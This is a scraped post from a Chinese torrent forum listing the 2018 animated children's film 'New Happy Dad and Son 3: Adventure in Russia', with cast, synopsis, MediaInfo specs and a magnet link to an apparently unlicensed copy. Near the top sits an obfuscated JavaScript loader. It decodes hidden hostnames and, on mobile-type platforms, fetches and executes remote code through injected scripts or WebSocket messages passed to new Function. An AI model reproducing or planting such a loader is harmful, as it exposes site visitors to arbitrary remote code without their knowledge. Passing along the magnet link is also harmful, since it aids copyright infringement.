新大头儿子和小头爸爸3:俄罗斯奇遇记[国语配音/中文字幕].New.Happy.Dad.and.Son.3.Adventure.in.Russia.2018.WEB-DL.1080p.H264.AAC 2.88GB

版主小s 12天前 77

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 新大头儿子和小头爸爸3:俄罗斯奇遇记 / 新大头儿子和小头爸爸3 / New Happy Dad and Son 3: Adventure in Russia

◎年 代 2018

◎产 地 中国大陆

◎类 别 动画 / 家庭 / 儿童 / 冒险

◎语 言 汉语普通话

◎上映日期 2018-07-06(中国大陆)

◎IMDb链接 https://www.imdb.com/title/tt8669442/

◎豆瓣评分 4.8/10 (4069人评价)

◎豆瓣链接 https://movie.douban.com/subject/30198729/

◎片 长 80分钟

◎导 演 何澄 Cheng He (id:1342907)

徐铮 Zheng Xu (id:1428964)

◎编 剧 吴楠 Nan Wu (id:1322986)

卞智洪 Zhihong Bian (id:1350427)

吴垠 Yin Wu (id:1361144)

叶琳 Lin Ye (id:1361146)

贺崧 Song He (id:1361145)

◎演 员 刘纯燕 Chunyan Liu (id:1318433)

董浩 Hao Dong (id:1318435)

鞠萍 Ping Ju (id:1274251)

陈苏 Su Chen (id:1342904)

耿晨晨 Chenchen Geng (id:1342905)

周志强 Zhiqiang Zhou (id:1320628)

黄炜 Wei Huang (id:1354859)

杨莹 Ying Yang (id:1340116)

周沁 Qin Zhou (id:1331586)

傅国航 Guo-hang Fu (id:1406007)

张振益 Chen-Yi Chang (id:1280461)

李真惠 Zhenhui Li (id:1440146)

◎标 签 动画 / 儿童 / 电影 / 中国大陆 / 童年 / 2018 / 亲子 / 烂

◎简 介

小头爸爸带全家去俄罗斯出差,大头儿子在俄罗斯发现了自己画的白夜城是真实存在的,一家人半路遇到交通事故,被迫夜宿小旅馆,第二天醒来发现身处大头儿子画中的世界——白夜城。他们发现如果不解决白夜城中的危机便无法走出这个世界,一家人在白夜城中经历了重重困难终于回到了现实世界。

◎获奖情况 (共1项)

第32届中国电影金鸡奖 (2019)

最佳美术片(提名)

  1. ##### MediaInfo ######

  2. General

  3. Complete name : New Happy Dad and Son 3 Adventure in Russia 2018 WEB-DL 1080p H264 [email protected]

  4. Format : MPEG-4

  5. Format profile : Base Media

  6. Codec ID : isom (isom/avc1)

  7. File size : 2.88 GiB

  8. Duration : 1 h 21 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 5 032 kb/s

  11. Encoded date : UTC 2021-09-09 19:25:56

  12. Tagged date : UTC 2021-09-09 19:25:56


  13. Video

  14. ID : 1

  15. Format : AVC

  16. Format/Info : Advanced Video Codec

  17. Format profile : [email protected]

  18. Format settings : CABAC / 4 Ref Frames

  19. Format settings, CABAC : Yes

  20. Format settings, Reference frames : 4 frames

  21. Codec ID : avc1

  22. Codec ID/Info : Advanced Video Coding

  23. Duration : 1 h 21 min

  24. Bit rate : 4 882 kb/s

  25. Maximum bit rate : 13.3 Mb/s

  26. Width : 1 920 pixels

  27. Height : 1 080 pixels

  28. Display aspect ratio : 16:9

  29. Frame rate mode : Constant

  30. Frame rate : 25.000 FPS

  31. Color space : YUV

  32. Chroma subsampling : 4:2:0

  33. Bit depth : 8 bits

  34. Scan type : Progressive

  35. Bits/(Pixel*Frame) : 0.094

  36. Stream size : 2.80 GiB (97%)

  37. Encoded date : UTC 2021-09-09 19:25:56

  38. Tagged date : UTC 2021-09-09 19:26:31

  39. Codec configuration box : avcC


  40. Audio

  41. ID : 2

  42. Format : AAC LC

  43. Format/Info : Advanced Audio Codec Low Complexity

  44. Codec ID : mp4a-40-2

  45. Duration : 1 h 21 min

  46. Bit rate mode : Variable

  47. Bit rate : 144 kb/s

  48. Maximum bit rate : 161 kb/s

  49. Channel(s) : 2 channels

  50. Channel layout : L R

  51. Sampling rate : 44.1 kHz

  52. Frame rate : 43.066 FPS (1024 SPF)

  53. Compression mode : Lossy

  54. Stream size : 85.4 MiB (3%)

  55. Encoded date : UTC 2021-09-09 19:26:28

  56. Tagged date : UTC 2021-09-09 19:26:31


TAGS 冒险 动画 家庭 儿童

磁力链:
  • magnet:?xt=urn:btih:3E517E842C1C63F97B9004EACB226931DAA53651
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回